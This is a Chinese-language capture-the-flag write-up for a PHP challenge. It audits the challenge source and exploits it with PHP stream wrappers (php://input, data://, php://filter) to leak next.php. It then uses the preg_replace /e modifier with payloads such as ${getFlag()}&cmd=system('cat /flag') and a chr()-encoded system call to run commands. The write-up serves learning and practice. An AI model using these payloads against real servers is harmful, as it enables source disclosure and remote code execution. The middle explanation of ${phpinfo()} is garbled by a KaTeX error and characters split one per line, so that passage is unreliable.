考点
代码审计
命令执行
解题
打开环境
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file);
}
else{
highlight_file(__FILE__);
}
?>
首先注释中提示next.php,我们可以利用php伪协议获取
php://input
text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php
POST:
I have a dream
data://text/plain
text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
得到源码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
审计代码,我们将通过getFlag函数传入cmd参数来进行命令执行
1 preg_replace()的/e模式存在命令执行漏洞
当preg_match函数在匹配到符号正则的字符串时,会将替换字符串当作代码来执行。
题目中已经限定了替换字符是strtolower("\\1"),而\\1相当于\1,该字符在正则匹配中代表第一个子匹配项。
例如:payload为/?.*={${phpinfo()}}
原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});
但是该语句并不能执行phpinfo函数
对于传入的非法的 $_GET 数组参数名,会将其转换成下划线,这就导致我们正则匹配失效,所以我们传入的变量可以为\S*
正则表达式的\S:匹配所有非空白字符;
.号:匹配除\n外的任意字符;
*号:匹配前面的字符0次或者多次
+号:匹配前面的字符1次或者多次(如果要在url里输入+号,必须要对其进行编码,+号编码为:%2b)
最后,为什么要使用 {KaTeX parse error: Expected 'EOF', got '}' at position 12: {phpinfo()}}?** 或者 **{phpinfo()} ,才能执行 phpinfo 函数呢?这是由于在PHP中双引号包裹的字符串中可以解析变量,而单引号则不行。
p
h
p
i
n
f
o
(
)
?
?
中
的
?
?
p
h
p
i
n
f
o
(
)
?
?
会
被
当
做
变
量
先
执
行
,
执
行
后
,
即
变
成
?
?
{phpinfo()}** 中的 **phpinfo()** 会被当做变量先执行,执行后,即变成 **
phpinfo()??中的??phpinfo()??会被当做变量先执行,执行后,即变成??{1} (phpinfo()成功执行返回true)。
据此,我们可以构造payload
?\S*=${getFlag()}&cmd=system('cat /flag');
2 用chr拼接system的参数
?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
参考文章:
https://xz.aliyun.com/t/2557
https://blog.csdn.net/qq_51652864/article/details/116156707
https://blog.csdn.net/RABCDXB/article/details/115363699
|